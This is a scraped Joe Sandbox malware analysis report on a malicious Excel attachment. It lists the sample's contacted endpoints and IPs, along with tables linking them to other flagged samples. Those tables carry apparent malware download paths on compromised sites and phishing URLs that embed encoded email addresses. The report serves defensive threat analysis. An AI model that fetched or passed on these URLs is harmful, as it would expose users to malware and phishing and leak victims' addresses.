https://lookup.onenote.com/lookup/geolocation/v1 | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | | high
https://cortana.ai | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | URL Reputation: safe | unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | | high
https://cloudfiles.onenote.com/upload.aspx | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | | high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | | high
https://entitlement.diagnosticssdf.office.com | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | | high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | | high
https://api.aadrm.com/ | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | URL Reputation: safe | unknown
https://ofcrecsvcapi-int.azurewebsites.net/ | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | Avira URL Cloud: safe | unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | | high
https://api.microsoftstream.com/api/ | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | | high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | | high
https://cr.office.com | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | | high
https://portal.office.com/account/?ref=ClientMeControl | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | | high
https://ecs.office.com/config/v2/Office | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | | high
https://graph.ppe.windows.net | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | | high
https://res.getmicrosoftkey.com/api/redemptionevents | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | URL Reputation: safe | unknown
https://powerlift-frontdesk.acompli.net | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | URL Reputation: safe | unknown
https://tasks.office.com | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | | high
https://officeci.azurewebsites.net/api/ | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | Avira URL Cloud: safe | unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | | high
https://store.office.cn/addinstemplate | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | URL Reputation: safe | unknown
https://wus2-000.pagecontentsync. | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | URL Reputation: safe | unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid= | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | | high
https://globaldisco.crm.dynamics.com | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | | high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | | high
https://store.officeppe.com/addinstemplate | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | URL Reputation: safe | unknown
https://dev0-api.acompli.net/autodetect | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | URL Reputation: safe | unknown
https://www.odwebp.svc.ms | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | URL Reputation: safe | unknown
https://api.powerbi.com/v1.0/myorg/groups | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | | high
https://web.microsoftstream.com/video/ | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | | high
https://graph.windows.net | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | | high
https://dataservice.o365filtering.com/ | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | URL Reputation: safe | unknown
https://officesetup.getmicrosoftkey.com | 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.dr | false | URL Reputation: safe | unknown
                                                                https://analysis.windows.net/powerbi/api4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                  high
                                                                  https://prod-global-autodetect.acompli.net/autodetect4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://outlook.office365.com/autodiscover/autodiscover.json4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                    high
                                                                    https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                      high
                                                                      https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                        high
                                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                          high
                                                                          https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                            high
                                                                            https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                              high
                                                                              http://weather.service.msn.com/data.aspx4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                high
                                                                                https://apis.live.net/v5.0/4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                  high
                                                                                  https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                    high
                                                                                    https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                      high
                                                                                      https://management.azure.com4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                        high
                                                                                        https://incidents.diagnostics.office.com4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                          high
                                                                                          https://clients.config.office.net/user/v1.0/ios4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                            high
                                                                                            https://insertmedia.bing.office.net/odc/insertmedia4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                              high
                                                                                              https://o365auditrealtimeingestion.manage.office.com4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                high
                                                                                                https://outlook.office365.com/api/v1.0/me/Activities4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                  high
                                                                                                  https://api.office.net4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                    high
                                                                                                    https://incidents.diagnosticssdf.office.com4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                      high
                                                                                                      https://asgsmsproxyapi.azurewebsites.net/4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://clients.config.office.net/user/v1.0/android/policies4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                        high
                                                                                                        https://entitlement.diagnostics.office.com4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                          high
                                                                                                          https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                            high
                                                                                                            https://outlook.office.com/4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                              high
                                                                                                              https://storage.live.com/clientlogs/uploadlocation4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                high
                                                                                                                https://templatelogging.office.com/client/log4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                  high
                                                                                                                  https://outlook.office365.com/4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                    high
                                                                                                                    https://webshell.suite.office.com4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                      high
                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                        high
                                                                                                                        https://management.azure.com/4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                          high
                                                                                                                          https://ncus-000.contentsync.4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://login.windows.net/common/oauth2/authorize4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                            high
                                                                                                                            https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://graph.windows.net/4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                              high
                                                                                                                              https://api.powerbi.com/beta/myorg/imports4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                                high
                                                                                                                                https://devnull.onenote.com4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://messaging.office.com/4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://augloop.office.com/v24C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://skyapi.live.net/Activity/4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://clients.config.office.net/user/v1.0/mac4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://dataservice.o365filtering.com4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://api.cortana.ai4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://onedrive.live.com4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                                                                                                                high

Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
162.241.80.6 | unknown | United States | 46606 | UNIFIEDLAYER-AS-1US | true
138.36.237.100 | unknown | Argentina | 27823 | DattateccomAR | false
91.199.212.52 | unknown | United Kingdom | 48447 | SECTIGOGB | false
72.52.227.180 | unknown | United States | 32244 | LIQUIDWEBUS | false

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 356654
Start date: 23.02.2021
Start time: 14:25:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 10s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Complaint-447781983-02182021.xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of analysed new started processes analysed: 22
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.expl.evad.winXLS@11/9@4/4
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xls
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 52.113.196.254, 13.107.3.254, 13.107.246.254, 23.211.6.115, 52.147.198.201, 104.42.151.234, 52.109.88.177, 52.109.8.25, 104.43.139.144, 52.109.8.24, 52.255.188.83, 51.11.168.160, 104.43.193.48, 205.185.216.10, 205.185.216.42, 52.155.217.156, 20.54.26.129, 92.122.213.194, 92.122.213.247
• Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, s-ring.msedge.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, teams-9999.teams-msedge.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, s-ring.s-9999.s-msedge.net, t-ring.msedge.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, t-9999.t-msedge.net, skypedataprdcoleus17.cloudapp.net, s-9999.s-msedge.net, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, teams-ring.teams-9999.teams-msedge.net, teams-ring.msedge.net, t-ring.t-9999.t-msedge.net, skypedataprdcolwus16.cloudapp.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net

                                                                                                                                                Simulations

                                                                                                                                                Behavior and APIs

                                                                                                                                                No simulations

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
162.241.80.6 | Complaint-447781983-02182021.xls | malicious | pathinanchilearthmovers.com/eznwcdhx/44250596245254600000.dat
 | SecuriteInfo.com.Heur.10413.xls | malicious | pathinanchilearthmovers.com/eznwcdhx/44245960229745400000.dat
 | SecuriteInfo.com.Heur.10413.xls | malicious | pathinanchilearthmovers.com/eznwcdhx/44245955293750000000.dat
138.36.237.100 | Complaint-447781983-02182021.xls | malicious | jugueterialatorre.com.ar/xjzpfwc/44250596245254600000.dat
 | SecuriteInfo.com.Heur.10413.xls | malicious | jugueterialatorre.com.ar/xjzpfwc/44245960229745400000.dat
 | SecuriteInfo.com.Heur.10413.xls | malicious | jugueterialatorre.com.ar/xjzpfwc/44245955293750000000.dat
 | CompensationClaim-46373845-02032021.xls | malicious | jugueteriaelgato.com.ar/zsrrq/416212.jpg
 | CompensationClaim-46373845-02032021.xls | malicious | jugueteriaelgato.com.ar/zsrrq/416212.jpg
 | CompensationClaim-1245593270-02032021.xls | malicious | loonytoys.com.ar/rqksqzjvcmv/416212.jpg
 | CompensationClaim-1245593270-02032021.xls | malicious | loonytoys.com.ar/rqksqzjvcmv/416212.jpg
 | fp5H5ulYUE5566sbSLC2.xls | malicious | loonytoys.com.ar/rqksqzjvcmv/416212.jpg
 | fp5H5ulYUE5566sbSLC2.xls | malicious | loonytoys.com.ar/rqksqzjvcmv/416212.jpg
91.199.212.52 | CorpReport.exe | malicious | crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt
 | sys.dll | malicious | crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt
 | CorpReport.exe | malicious | crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt
 | CorpReport.exe | malicious | crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt
 | ReportCorp.exe | malicious | crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt
 | 1S0a576pAR.exe | malicious | crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt
 | NJx63jHebE.exe | malicious | crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt
 | EmployeeComplaintReport.exe | malicious | crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt
 | ct.dll | malicious | crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt
 | CompensationClaim-46373845-02032021.xls | malicious | crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt
 | https://emailcpcc-my.sharepoint.com:443/:b:/g/personal/aswania0_email_cpcc_edu/ESAvfBZdvHBMvBJK1bnZfsoBXf5RRY-PIqJk-UtmqkDXjQ?e=4%3auSHA5p&at=9&d=DwMBaQ | malicious | crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt
 | rib.exe | malicious | crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt
 | https://blog.premiershop.com.br/check/m.php | malicious | crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt
 | https://sixtiescity.net/ | malicious | crt.sectigo.com/SectigoRSAOrganizationValidationSecureServerCA.crt
 | http://lupnfykektpyfxalupnfykektpyfxalupnfykektpyfxa.reiscooqer.com/bGVlLmZpcmVrQGJyaXRpc2hnYXMuY28udWs= | malicious | zerossl.crt.sectigo.com/ZeroSSLRSADomainSecureSiteCA.crt
 | http://lupnfykektpyfxalupnfykektpyfxalupnfykektpyfxa.reiscooqer.com/bGVlLmZpcmVrQGJyaXRpc2hnYXMuY28udWs= | malicious | zerossl.crt.sectigo.com/ZeroSSLRSADomainSecureSiteCA.crt
 | http://zmisrgramkgzgcwzmisrgramkgzgcwzmisrgramkgzgcw.pacificcaqital.com/bGFtQHNwYXJub3JkLmRr | malicious | zerossl.crt.sectigo.com/ZeroSSLRSADomainSecureSiteCA.crt
 | http://zaimwlqldrvcd.sweetwaterssecurities.com/dGVzdEB0ZXN0LmNvbQ== | malicious | zerossl.crt.sectigo.com/ZeroSSLRSADomainSecureSiteCA.crt
 | http://zvzuholzrkbla.leedsvvest.com/Y2hhcmxlcy55ZWVAbGl2aWJhbmsuY29t | malicious | zerossl.crt.sectigo.com/ZeroSSLRSADomainSecureSiteCA.crt
 | https://comvoce.philco.com.br/wp-forum/administracion/prelogin.php | malicious | crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt

Domains

Match | Associated Sample Name / URL | Detection | Context
crt.sectigo.com | Complaint-447781983-02182021.xls | malicious | 91.199.212.52
 | CorpReport.exe | malicious | 91.199.212.52
 | sys.dll | malicious | 91.199.212.52
 | CorpReport.exe | malicious | 91.199.212.52
 | CorpReport.exe | malicious | 91.199.212.52
 | ReportCorp.exe | malicious | 91.199.212.52
 | 1S0a576pAR.exe | malicious | 91.199.212.52
 | NJx63jHebE.exe | malicious | 91.199.212.52
 | EmployeeComplaintReport.exe | malicious | 91.199.212.52
 | ct.dll | malicious | 91.199.212.52
 | CompensationClaim-46373845-02032021.xls | malicious | 91.199.212.52
 | CompensationClaim-46373845-02032021.xls | malicious | 91.199.212.52
 | documents.doc | malicious | 91.199.212.52
 | ST_Heodo_ST_2021-01-05_19-42-11-017.eml_20210105Rechnung.doc_analyze.doc | malicious | 91.199.212.52
 | N.11389944 BS 05 gen 2021.doc | malicious | 91.199.212.52
 | PSX7103491.doc | malicious | 91.199.212.52
 | Beauftragung.doc | malicious | 91.199.212.52
 | #U00e0#U00a4#U00ac#U00e0#U00a5#U20ac#U00e0#U00a4#U0153#U00e0#U00a4#U2022.doc | malicious | 91.199.212.52
 | https://emailcpcc-my.sharepoint.com:443/:b:/g/personal/aswania0_email_cpcc_edu/ESAvfBZdvHBMvBJK1bnZfsoBXf5RRY-PIqJk-UtmqkDXjQ?e=4%3auSHA5p&at=9&d=DwMBaQ | malicious | 91.199.212.52
 | rib.exe | malicious | 91.199.212.52
rzminc.com | SecuriteInfo.com.Heur.10413.xls | malicious | 72.52.227.180
 | SecuriteInfo.com.Heur.10413.xls | malicious | 72.52.227.180
jugueterialatorre.com.ar | Complaint-447781983-02182021.xls | malicious | 138.36.237.100
 | SecuriteInfo.com.Heur.10413.xls | malicious | 138.36.237.100
 | SecuriteInfo.com.Heur.10413.xls | malicious | 138.36.237.100
pathinanchilearthmovers.com | Complaint-447781983-02182021.xls | malicious | 162.241.80.6
 | SecuriteInfo.com.Heur.10413.xls | malicious | 162.241.80.6
 | SecuriteInfo.com.Heur.10413.xls | malicious | 162.241.80.6

ASN

Match | Associated Sample Name / URL | Detection | Context
DattateccomAR | Complaint-447781983-02182021.xls | malicious | 138.36.237.100
 | SecuriteInfo.com.Heur.10413.xls | malicious | 138.36.237.100
 | SecuriteInfo.com.Heur.10413.xls | malicious | 138.36.237.100
 | swift copy pdf.exe | malicious | 200.58.111.74
 | Purchase Order _pdf.exe | malicious | 200.58.111.74
 | Purchase Order _pdf.exe | malicious | 200.58.111.74
 | CompensationClaim-46373845-02032021.xls | malicious | 138.36.237.100
 | CompensationClaim-46373845-02032021.xls | malicious | 138.36.237.100
 | CompensationClaim-1245593270-02032021.xls | malicious | 138.36.237.100
 | CompensationClaim-1245593270-02032021.xls | malicious | 138.36.237.100
 | fp5H5ulYUE5566sbSLC2.xls | malicious | 138.36.237.100
 | fp5H5ulYUE5566sbSLC2.xls | malicious | 138.36.237.100
 | Payment Advice.xlsx | malicious | 66.97.33.176
 | Meezan Bank Payment.xlsx | malicious | 179.43.117.150
 | Walmart Order.xlsx | malicious | 179.43.117.150
 | INQUIRY-NOV-ORDER.xls | malicious | 179.43.114.162
 | https://bit.ly/38rE21V?/rt/stone/ | malicious | 200.58.98.166
 | PQ-237.xls | malicious | 66.97.33.213
 | PQ-237.xls | malicious | 66.97.33.213
 | PQ-171.xls | malicious | 66.97.33.213
SECTIGOGB | CorpReport.exe | malicious | 91.199.212.52
 | sys.dll | malicious | 91.199.212.52
 | CorpReport.exe | malicious | 91.199.212.52
 | CorpReport.exe | malicious | 91.199.212.52
 | ReportCorp.exe | malicious | 91.199.212.52
 | 1S0a576pAR.exe | malicious | 91.199.212.52
                                                                                                                                                NJx63jHebE.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                EmployeeComplaintReport.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                ct.dllGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                CompensationClaim-46373845-02032021.xlsGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                https://emailcpcc-my.sharepoint.com:443/:b:/g/personal/aswania0_email_cpcc_edu/ESAvfBZdvHBMvBJK1bnZfsoBXf5RRY-PIqJk-UtmqkDXjQ?e=4%3auSHA5p&at=9&d=DwMBaQGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                rib.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                https://blog.premiershop.com.br/check/m.phpGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                https://sixtiescity.net/Get hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                http://lupnfykektpyfxalupnfykektpyfxalupnfykektpyfxa.reiscooqer.com/bGVlLmZpcmVrQGJyaXRpc2hnYXMuY28udWs=Get hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                http://lupnfykektpyfxalupnfykektpyfxalupnfykektpyfxa.reiscooqer.com/bGVlLmZpcmVrQGJyaXRpc2hnYXMuY28udWs=Get hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                http://zmisrgramkgzgcwzmisrgramkgzgcwzmisrgramkgzgcw.pacificcaqital.com/bGFtQHNwYXJub3JkLmRrGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                http://zaimwlqldrvcd.sweetwaterssecurities.com/dGVzdEB0ZXN0LmNvbQ==Get hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                http://zvzuholzrkbla.leedsvvest.com/Y2hhcmxlcy55ZWVAbGl2aWJhbmsuY29tGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                https://comvoce.philco.com.br/wp-forum/administracion/prelogin.phpGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                UNIFIEDLAYER-AS-1USComplaint-447781983-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                • 162.241.80.6
                                                                                                                                                Payment Transfer Copy of $274,876.00 for the invoice shipments.exeGet hashmaliciousBrowse
                                                                                                                                                • 50.116.112.43
                                                                                                                                                ORDER SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                                                                                                                • 50.87.196.120
                                                                                                                                                PO-A2174679-06.exeGet hashmaliciousBrowse
                                                                                                                                                • 192.185.78.145
                                                                                                                                                22 FEB -PROCESSING.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 108.167.156.42
                                                                                                                                                CV-JOB REQUEST______PDF.EXEGet hashmaliciousBrowse
                                                                                                                                                • 192.185.181.49
                                                                                                                                                PO.exeGet hashmaliciousBrowse
                                                                                                                                                • 192.185.0.218
                                                                                                                                                Complaint-1091191320-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                • 192.185.16.95
                                                                                                                                                ESCANEAR_FACTURA-20794564552_docx.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.214.158.75
                                                                                                                                                AWB-INVOICE_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                • 192.185.46.55
                                                                                                                                                iAxkn PDF.exeGet hashmaliciousBrowse
                                                                                                                                                • 192.185.100.181
                                                                                                                                                carta de pago pdf.exeGet hashmaliciousBrowse
                                                                                                                                                • 192.185.5.166
                                                                                                                                                PO.exeGet hashmaliciousBrowse
                                                                                                                                                • 108.179.232.42
                                                                                                                                                payment details.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                • 50.87.95.32
                                                                                                                                                new order.exeGet hashmaliciousBrowse
                                                                                                                                                • 108.179.232.42
                                                                                                                                                CV-JOB REQUEST______pdf.exeGet hashmaliciousBrowse
                                                                                                                                                • 192.185.181.49
                                                                                                                                                RdLlHaxEKP.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.214.184.71
                                                                                                                                                Drawings2.exeGet hashmaliciousBrowse
                                                                                                                                                • 198.57.247.220
                                                                                                                                                EFT Remittance.xlsGet hashmaliciousBrowse
                                                                                                                                                • 162.241.120.180
                                                                                                                                                Remittance Advice.xlsGet hashmaliciousBrowse
                                                                                                                                                • 162.241.120.180

JA3 Fingerprints

Columns: Match | Associated Sample Name / URL (Detection) | Context

Match: 37f463bf4616ecd445d4a1937da06e19
SHIPPING-DOCUMENT.docx (malicious)
• 138.36.237.100
REVISED ORDER 2322020.EXE (malicious)
• 138.36.237.100
PO112000891122110.exe (malicious)
• 138.36.237.100
OutplayedInstaller (1).exe (malicious)
• 138.36.237.100
Facecheck - app-Installer (1).exe (malicious)
• 138.36.237.100
Buff-Installer (9).exe (malicious)
• 138.36.237.100
coltTicket#513473.htm (malicious)
• 138.36.237.100
FortPlayerInstaller.exe (malicious)
• 138.36.237.100
RGB HeroInstaller.exe (malicious)
• 138.36.237.100
Buff-Installer.exe (malicious)
• 138.36.237.100
unmapped_executable_of_polyglot_duke.dll (malicious)
• 138.36.237.100
smartandfinalTicket#51347303511505986.htm (malicious)
• 138.36.237.100
f4b1bde3-706a-40d2-8ace-693803810b6f.exe (malicious)
• 138.36.237.100
LIQUIDACION INTERBANCARIA 02_22_2021.xls (malicious)
• 138.36.237.100
document-550193913.xls (malicious)
• 138.36.237.100
